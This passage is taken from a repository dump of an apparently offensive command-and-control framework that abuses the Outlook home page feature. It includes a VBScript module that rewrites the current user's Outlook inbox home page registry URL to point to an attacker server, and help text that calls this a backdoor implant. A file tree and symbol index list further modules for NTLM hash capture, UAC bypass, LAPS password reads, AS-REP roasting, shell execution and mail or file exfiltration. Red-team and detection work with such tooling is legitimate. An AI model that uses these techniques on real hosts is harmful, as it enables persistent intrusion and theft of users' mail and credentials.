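        self.depends = ['./helperFunctions/Setregvalue_hkcu.txt']
        # quotedstring is the project's option handler; its behaviour is not
        # visible here.
        self.options['homepageurl'] = {
            "value": None,
            "required": True,
            "description": "URL to new Specula Homepage validation",
            "handler": quotedstring,
        }
        super().__init__(templatepath)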
================================================
FILE: functions/execute/host/migrate_homepage.txt
================================================
Function Execute_MigrateHomepage()
' Overwrites the Outlook inbox home page URL in the current user's registry
' hive with the {{homepageurl}} template placeholder and returns a status string.
' Runtime errors are suppressed from here on; nothing below inspects Err.
On Error Resume Next
' First four characters of the Outlook version string, used as the Office
' version key name.
version = left(window.external.OutlookApplication.Version,4)
' Resulting location: software\microsoft\office\<version>\outlook\webview\inbox
' under HKCU, value name "URL". Writes to this value are the registry artifact
' of this module and the place to monitor or baseline.
basepath = "software\microsoft\office\" + version + "\outlook\webview\inbox"
' SetRegValue_HKCU is not defined in this file; the module descriptor lists a
' helper template as a dependency. The result of the call is stored but not
' checked.
SetValue_HKCU_Registry = SetRegValue_HKCU(basepath, "REG_SZ", "URL", {{homepageurl}})
' Returned unconditionally, so it does not show whether the write succeeded.
Execute_MigrateHomepage = "Registry updated to point to new Specula server"
End Function
================================================
FILE: functions/execute/host/remove_homepage.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
def __init__(self, templatepath, helpers):
self.options = {}
self.helpers = helpers
self.help = """
Removes the homepage implant in a nice way :-).
This should be used when you want to remove the homepage backdoor on a host.
It removes the URL registry key as well as the EnableRoamingFolderHomepages.
It uses WbemScripting.SWbemNamedValueSet
- Add.__ProviderArchitecture
- Add.__RequiredArchitecture
It uses Wbem
gitextract_vdz89222/
├── .gitignore
├── CONTRIBUTING.md
├── README.md
├── Taskbooks/
│ ├── enum_installed_software.py
│ └── example.py
├── api/
│ ├── README.md
│ ├── SpeculaApi/
│ │ ├── Sepcula.cpp
│ │ ├── Sepcula.h
│ │ ├── Sepcula.rgs
│ │ ├── SpeculaApi.cpp
│ │ ├── SpeculaApi.def
│ │ ├── SpeculaApi.idl
│ │ ├── SpeculaApi.rc
│ │ ├── SpeculaApi.rgs
│ │ ├── SpeculaApi.vcxproj
│ │ ├── SpeculaApi.vcxproj.filters
│ │ ├── SpeculaApi_i.h
│ │ ├── SpeculaApips.def
│ │ ├── dllmain.cpp
│ │ ├── dllmain.h
│ │ ├── framework.h
│ │ ├── pch.cpp
│ │ ├── pch.h
│ │ ├── resource.h
│ │ └── targetver.h
│ ├── SpeculaApi.sln
│ └── SpeculaApiPS/
│ ├── SpeculaApiPS.vcxproj
│ └── SpeculaApiPS.vcxproj.filters
├── functions/
│ ├── api/
│ │ ├── install_api.py
│ │ ├── install_api.txt
│ │ ├── load_dll.py
│ │ ├── load_dll.txt
│ │ ├── remove_api.py
│ │ ├── remove_api.txt
│ │ ├── run_shell.py
│ │ ├── run_shell.txt
│ │ ├── verify_api.py
│ │ └── verify_api.txt
│ ├── enumerate/
│ │ ├── host/
│ │ │ ├── list_amsiproviders.py
│ │ │ ├── list_amsiproviders.txt
│ │ │ ├── list_applocker.py
│ │ │ ├── list_applocker.txt
│ │ │ ├── list_autoruns.py
│ │ │ ├── list_autoruns.txt
│ │ │ ├── list_basic.py
│ │ │ ├── list_basic.txt
│ │ │ ├── list_boottime.py
│ │ │ ├── list_boottime.txt
│ │ │ ├── list_clipboard.py
│ │ │ ├── list_clipboard.txt
│ │ │ ├── list_environmentvariables.py
│ │ │ ├── list_environmentvariables.txt
│ │ │ ├── list_gpp.py
│ │ │ ├── list_gpp.txt
│ │ │ ├── list_hostsfile.py
│ │ │ ├── list_hostsfile.txt
│ │ │ ├── list_hotfixes.py
│ │ │ ├── list_hotfixes.txt
│ │ │ ├── list_installedapps.py
│ │ │ ├── list_installedapps.txt
│ │ │ ├── list_installeddotnet.py
│ │ │ ├── list_installeddotnet.txt
│ │ │ ├── list_installedpowershell.py
│ │ │ ├── list_installedpowershell.txt
│ │ │ ├── list_iprouting.py
│ │ │ ├── list_iprouting.txt
│ │ │ ├── list_localadmins.py
│ │ │ ├── list_localadmins.txt
│ │ │ ├── list_localusers.py
│ │ │ ├── list_localusers.txt
│ │ │ ├── list_logging.py
│ │ │ ├── list_logging.txt
│ │ │ ├── list_mappeddrives.py
│ │ │ ├── list_mappeddrives.txt
│ │ │ ├── list_networkcardinfo.py
│ │ │ ├── list_networkcardinfo.txt
│ │ │ ├── list_networklogon.py
│ │ │ ├── list_networklogon.txt
│ │ │ ├── list_ntdomaininfo.py
│ │ │ ├── list_ntdomaininfo.txt
│ │ │ ├── list_officearch.py
│ │ │ ├── list_officearch.txt
│ │ │ ├── list_printers.py
│ │ │ ├── list_printers.txt
│ │ │ ├── list_processes.py
│ │ │ ├── list_processes.txt
│ │ │ ├── list_recentcommands.py
│ │ │ ├── list_recentcommands.txt
│ │ │ ├── list_recentfiles.py
│ │ │ ├── list_recentfiles.txt
│ │ │ ├── list_recyclebin.py
│ │ │ ├── list_recyclebin.txt
│ │ │ ├── list_scheduledtasks.py
│ │ │ ├── list_scheduledtasks.txt
│ │ │ ├── list_servicepermissions.py
│ │ │ ├── list_servicepermissions.txt
│ │ │ ├── list_services.py
│ │ │ ├── list_services.txt
│ │ │ ├── list_startmenu.py
│ │ │ ├── list_startmenu.txt
│ │ │ ├── list_timezone.py
│ │ │ ├── list_timezone.txt
│ │ │ ├── list_whoami.py
│ │ │ ├── list_whoami.txt
│ │ │ ├── list_windowsarch.py
│ │ │ ├── list_windowsarch.txt
│ │ │ ├── list_windowsversion.py
│ │ │ └── list_windowsversion.txt
│ │ └── ldap/
│ │ ├── ldap_query.py
│ │ ├── ldap_query.txt
│ │ ├── list_addcomputertodomain.py
│ │ ├── list_addcomputertodomain.txt
│ │ ├── list_asreproast.py
│ │ ├── list_asreproast.txt
│ │ ├── list_computer.py
│ │ ├── list_computer.txt
│ │ ├── list_computers.py
│ │ ├── list_computers.txt
│ │ ├── list_domaininfo.py
│ │ ├── list_domaininfo.txt
│ │ ├── list_lapspassword.py
│ │ ├── list_lapspassword.txt
│ │ ├── list_passwordnotrequired.py
│ │ ├── list_passwordnotrequired.txt
│ │ ├── list_passwordpolicy.py
│ │ ├── list_passwordpolicy.txt
│ │ ├── list_user.py
│ │ ├── list_user.txt
│ │ ├── list_users.py
│ │ └── list_users.txt
│ ├── execute/
│ │ └── host/
│ │ ├── application.py
│ │ ├── application.txt
│ │ ├── capture_netntlmv2.py
│ │ ├── capture_netntlmv2.txt
│ │ ├── cmd.py
│ │ ├── cmd.txt
│ │ ├── execute_excel4macro.py
│ │ ├── execute_excel4macro.txt
│ │ ├── execute_registerxll.py
│ │ ├── execute_registerxll.txt
│ │ ├── migrate_homepage.py
│ │ ├── migrate_homepage.txt
│ │ ├── remove_homepage.py
│ │ ├── remove_homepage.txt
│ │ ├── set_calendarhomepagehook.py
│ │ ├── set_calendarhomepagehook.txt
│ │ ├── spawnproc_explorer.py
│ │ ├── spawnproc_explorer.txt
│ │ ├── uac-sdclt.py
│ │ ├── uac-sdclt.txt
│ │ ├── wmi_execute.py
│ │ ├── wmi_execute.txt
│ │ ├── wmi_killprocname.py
│ │ ├── wmi_killprocname.txt
│ │ ├── wmi_killprocpid.py
│ │ ├── wmi_killprocpid.txt
│ │ ├── wscriptshell.py
│ │ └── wscriptshell.txt
│ ├── operation/
│ │ ├── file/
│ │ │ ├── cat_file.py
│ │ │ ├── cat_file.txt
│ │ │ ├── check_filearch.py
│ │ │ ├── check_filearch.txt
│ │ │ ├── check_fileexist.py
│ │ │ ├── check_fileexist.txt
│ │ │ ├── check_filehash.py
│ │ │ ├── check_filehash.txt
│ │ │ ├── copy_dir.py
│ │ │ ├── copy_dir.txt
│ │ │ ├── copy_file.py
│ │ │ ├── copy_file.txt
│ │ │ ├── create_dir.py
│ │ │ ├── create_dir.txt
│ │ │ ├── create_shortcut.py
│ │ │ ├── create_shortcut.txt
│ │ │ ├── delete_dir.py
│ │ │ ├── delete_dir.txt
│ │ │ ├── delete_file.py
│ │ │ ├── delete_file.txt
│ │ │ ├── download_filehttp.py
│ │ │ ├── download_filehttp.txt
│ │ │ ├── get_file.py
│ │ │ ├── get_file.txt
│ │ │ ├── list_acl.py
│ │ │ ├── list_acl.txt
│ │ │ ├── list_dir.py
│ │ │ ├── list_dir.txt
│ │ │ ├── list_shortcutinfo.py
│ │ │ ├── list_shortcutinfo.txt
│ │ │ ├── move_file.py
│ │ │ ├── move_file.txt
│ │ │ ├── put_file.py
│ │ │ ├── put_file.txt
│ │ │ ├── split_file.py
│ │ │ ├── split_file.txt
│ │ │ ├── zip_content.py
│ │ │ └── zip_content.txt
│ │ ├── network/
│ │ │ ├── netstat.py
│ │ │ ├── netstat.txt
│ │ │ ├── nslookup.py
│ │ │ └── nslookup.txt
│ │ ├── outlook/
│ │ │ ├── adjust_notifications.py
│ │ │ ├── adjust_notifications.txt
│ │ │ ├── change_outlookfolder.py
│ │ │ ├── change_outlookfolder.txt
│ │ │ ├── changeview_outlookfolder.py
│ │ │ ├── changeview_outlookfolder.txt
│ │ │ ├── delete_mail.py
│ │ │ ├── delete_mail.txt
│ │ │ ├── dump_gal.py
│ │ │ ├── dump_gal.txt
│ │ │ ├── get_emailaddress.py
│ │ │ ├── get_emailaddress.txt
│ │ │ ├── list_notifications.py
│ │ │ ├── list_notifications.txt
│ │ │ ├── list_overview.py
│ │ │ ├── list_overview.txt
│ │ │ ├── read_calendar.py
│ │ │ ├── read_calendar.txt
│ │ │ ├── read_contacts.py
│ │ │ ├── read_contacts.txt
│ │ │ ├── read_email.py
│ │ │ ├── read_email.txt
│ │ │ ├── read_emailnamedfolder.py
│ │ │ ├── read_emailnamedfolder.txt
│ │ │ ├── read_other.py
│ │ │ ├── read_other.txt
│ │ │ ├── savedraft_filemail.py
│ │ │ ├── savedraft_filemail.txt
│ │ │ ├── search_email.py
│ │ │ ├── search_email.txt
│ │ │ ├── send_mail.py
│ │ │ ├── send_mail.txt
│ │ │ ├── sendfile_mail.py
│ │ │ ├── sendfile_mail.txt
│ │ │ ├── stop_outlook.py
│ │ │ └── stop_outlook.txt
│ │ ├── registry/
│ │ │ ├── delkeyhkcuregistry.py
│ │ │ ├── delkeyhkcuregistry.txt
│ │ │ ├── delvaluehkcuregistry.py
│ │ │ ├── delvaluehkcuregistry.txt
│ │ │ ├── getallkeysregistry.py
│ │ │ ├── getallkeysregistry.txt
│ │ │ ├── getallvaluesregistry.py
│ │ │ ├── getallvaluesregistry.txt
│ │ │ ├── getvalueregistry.py
│ │ │ ├── getvalueregistry.txt
│ │ │ ├── setvaluehkcuregistry.py
│ │ │ └── setvaluehkcuregistry.txt
│ │ └── specula/
│ │ ├── remove_allowlongscriptruntime.py
│ │ ├── remove_allowlongscriptruntime.txt
│ │ ├── set_allowlongscriptruntime.py
│ │ └── set_allowlongscriptruntime.txt
│ └── trolling/
│ ├── play_voice.py
│ ├── play_voice.txt
│ ├── set_clipboard.py
│ └── set_clipboard.txt
├── helperFunctions/
│ ├── Delregkey_hkcu.txt
│ ├── Delregvalue_hkcu.txt
│ ├── Getallregkeys.txt
│ ├── Getallregvalues.txt
│ ├── Getregvalue.txt
│ ├── HexToBytes.txt
│ ├── Setregvalue_hkcu.txt
│ ├── base64.txt
│ ├── base_template.txt
│ ├── createstream.txt
│ ├── dir_creator.txt
│ ├── dir_lister.txt
│ └── supportFuncs.txt
├── hiddenFunctions/
│ ├── downloadGAL.py
│ ├── downloadGAL.txt
│ ├── download_file.py
│ ├── download_file.txt
│ ├── upload_file.py
│ └── upload_file.txt
├── hooker_generator.py
├── lib/
│ ├── core/
│ │ ├── helpers.py
│ │ ├── setup.py
│ │ ├── specagents.py
│ │ ├── specmodule.py
│ │ ├── specpayload.py
│ │ ├── spectaskbook.py
│ │ ├── utility.py
│ │ └── utils.py
│ ├── handlers/
│ │ ├── base.html
│ │ ├── blacklist.html
│ │ ├── dev_blank.html
│ │ ├── dev_encrypted_task_template.html
│ │ ├── dev_unencrypted_task_template.html
│ │ ├── redirect_template.html
│ │ ├── specapplication.py
│ │ ├── speccomms.py
│ │ ├── specdevcomms.py
│ │ ├── specpayload.py
│ │ ├── specvalidate.py
│ │ └── validation.html
│ ├── menu/
│ │ ├── specpromptdbedit.py
│ │ ├── specpromptexplorer.py
│ │ ├── specpromptinteract.py
│ │ ├── specpromptmodule.py
│ │ ├── specpromptpayload.py
│ │ ├── specpromptprestage.py
│ │ └── specpromptpushover.py
│ ├── modhandlers/
│ │ └── generic.py
│ ├── tab_completers/
│ │ └── generic.py
│ └── validators/
│ ├── files.py
│ └── generic.py
├── release_history.txt
├── requirements.txt
├── specula.py
└── ssl/
├── ssl-cert-snakeoil.key
└── ssl-cert-snakeoil.pem
SYMBOL INDEX (667 symbols across 150 files)
FILE: Taskbooks/enum_installed_software.py
function TaskBook (line 1) | def TaskBook(helpers, agent):
FILE: Taskbooks/example.py
function TaskBook (line 1) | def TaskBook(helpers, agent):
FILE: api/SpeculaApi/Sepcula.h
function BEGIN_COM_MAP (line 27) | DECLARE_REGISTRY_RESOURCEID(IDR_SEPCULA)
function FinalRelease (line 44) | void FinalRelease()
FILE: api/SpeculaApi/SpeculaApi.cpp
function _Use_decl_annotations_ (line 14) | _Use_decl_annotations_
function _Use_decl_annotations_ (line 21) | _Use_decl_annotations_
function _Use_decl_annotations_ (line 28) | _Use_decl_annotations_
function _Use_decl_annotations_ (line 37) | _Use_decl_annotations_
function STDAPI (line 45) | STDAPI DllInstall(BOOL bInstall, _In_opt_ LPCWSTR pszCmdLine)
FILE: api/SpeculaApi/SpeculaApi_i.h
type interface (line 57) | typedef interface ISepcula ISepcula;
type class (line 66) | typedef class Sepcula Sepcula;
type Sepcula (line 68) | typedef struct Sepcula Sepcula;
type ISepculaVtbl (line 114) | typedef struct ISepculaVtbl
function interface (line 191) | interface ISepcula
FILE: api/SpeculaApi/dllmain.cpp
function BOOL (line 12) | BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
FILE: api/SpeculaApi/dllmain.h
function class (line 3) | class CSpeculaApiModule : public ATL::CAtlDllModuleT< CSpeculaApiModule >
FILE: functions/api/install_api.py
class Spec (line 8) | class Spec(SpecModule):
method __init__ (line 9) | def __init__(self, templatepath, helpers):
method rethandler (line 34) | def rethandler(self, agent, options, data):
FILE: functions/api/load_dll.py
class Spec (line 3) | class Spec(SpecModule):
method __init__ (line 4) | def __init__(self, templatepath, helpers):
method preprocess (line 20) | def preprocess(self, agent):
FILE: functions/api/remove_api.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
method preprocess (line 28) | def preprocess(self, agent):
method rethandler (line 36) | def rethandler(self, agent, options, data):
FILE: functions/api/run_shell.py
class Spec (line 3) | class Spec(SpecModule):
method __init__ (line 4) | def __init__(self, templatepath, helpers):
method preprocess (line 20) | def preprocess(self, agent):
FILE: functions/api/verify_api.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
method rethandler (line 19) | def rethandler(self, agent, options, data):
FILE: functions/enumerate/host/list_amsiproviders.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_applocker.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_autoruns.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
method preprocess (line 43) | def preprocess(self, agent):
FILE: functions/enumerate/host/list_basic.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
method rethandler (line 25) | def rethandler(self, agent, options, data):
FILE: functions/enumerate/host/list_boottime.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_clipboard.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_environmentvariables.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_gpp.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_hostsfile.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_hotfixes.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_installedapps.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_installeddotnet.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_installedpowershell.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_iprouting.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_localadmins.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_localusers.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_logging.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_mappeddrives.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_networkcardinfo.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_networklogon.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_ntdomaininfo.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_officearch.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
method rethandler (line 22) | def rethandler(self, agent, options, data):
FILE: functions/enumerate/host/list_printers.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_processes.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_recentcommands.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_recentfiles.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_recyclebin.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_scheduledtasks.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_servicepermissions.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_services.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_startmenu.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/host/list_timezone.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method rethandler (line 24) | def rethandler(self, agent, options, data):
FILE: functions/enumerate/host/list_whoami.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
method rethandler (line 24) | def rethandler(self, agent, options, data):
FILE: functions/enumerate/host/list_windowsarch.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
method rethandler (line 22) | def rethandler(self, agent, options, data):
FILE: functions/enumerate/host/list_windowsversion.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
method rethandler (line 22) | def rethandler(self, agent, options, data):
FILE: functions/enumerate/ldap/ldap_query.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
method preprocess (line 55) | def preprocess(self, agent):
FILE: functions/enumerate/ldap/list_addcomputertodomain.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/ldap/list_asreproast.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/ldap/list_computer.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/ldap/list_computers.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/ldap/list_domaininfo.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/ldap/list_lapspassword.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/ldap/list_passwordnotrequired.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/ldap/list_passwordpolicy.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/ldap/list_user.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/enumerate/ldap/list_users.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/application.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/capture_netntlmv2.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
method preprocess (line 48) | def preprocess(self, agent):
FILE: functions/execute/host/cmd.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/execute_excel4macro.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/execute_registerxll.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/migrate_homepage.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/remove_homepage.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/set_calendarhomepagehook.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
method preprocess (line 35) | def preprocess(self, agent):
FILE: functions/execute/host/spawnproc_explorer.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/uac-sdclt.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/wmi_execute.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/wmi_killprocname.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/wmi_killprocpid.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/execute/host/wscriptshell.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/cat_file.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method rethandler (line 39) | def rethandler(self, agent, options, data):
FILE: functions/operation/file/check_filearch.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/check_fileexist.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/check_filehash.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/copy_dir.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/copy_file.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/create_dir.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/create_shortcut.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method preprocess (line 78) | def preprocess(self, agent):
FILE: functions/operation/file/delete_dir.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/delete_file.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/download_filehttp.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/get_file.py
class Spec (line 10) | class Spec(SpecModule):
method __init__ (line 11) | def __init__(self, templatepath, helpers):
method rethandler (line 48) | def rethandler(self, agent, options, data):
FILE: functions/operation/file/list_acl.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/list_dir.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method rethandler (line 108) | def rethandler(self, agent, options, data):
FILE: functions/operation/file/list_shortcutinfo.py
class Spec (line 3) | class Spec(SpecModule):
method __init__ (line 4) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/move_file.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/put_file.py
class Spec (line 10) | class Spec(SpecModule):
method __init__ (line 11) | def __init__(self, templatepath, helpers):
method preprocess (line 58) | def preprocess(self, agent):
method rethandler (line 98) | def rethandler(self, agent, options, data):
FILE: functions/operation/file/split_file.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/operation/file/zip_content.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/network/netstat.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/network/nslookup.py
class Spec (line 4) | class Spec(SpecModule):
method __init__ (line 5) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/adjust_notifications.py
class Spec (line 7) | class Spec(SpecModule):
method __init__ (line 8) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/change_outlookfolder.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/changeview_outlookfolder.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/delete_mail.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/dump_gal.py
class Spec (line 8) | class Spec(SpecModule):
method __init__ (line 9) | def __init__(self, templatepath, helpers):
method rethandler (line 38) | def rethandler(self, agent, options, data):
FILE: functions/operation/outlook/get_emailaddress.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/list_notifications.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/list_overview.py
class Spec (line 3) | class Spec(SpecModule):
method __init__ (line 4) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/read_calendar.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/read_contacts.py
class Spec (line 3) | class Spec(SpecModule):
method __init__ (line 4) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/read_email.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method preprocess (line 54) | def preprocess(self, agent):
FILE: functions/operation/outlook/read_emailnamedfolder.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
FILE: functions/operation/outlook/read_other.py
class Spec (line 6) | class Spec(SpecModule):
method __init__ (line 7) | def __init__(self, templatepath, helpers):
method preprocess (line 44) | def preprocess(self, agent):
FILE: functions/operation/outlook/savedraft_filemail.py
class Spec (line 5) | class Spec(SpecModule):
method __init__ (line 6) | def __init__(self, templatepath, helpers):
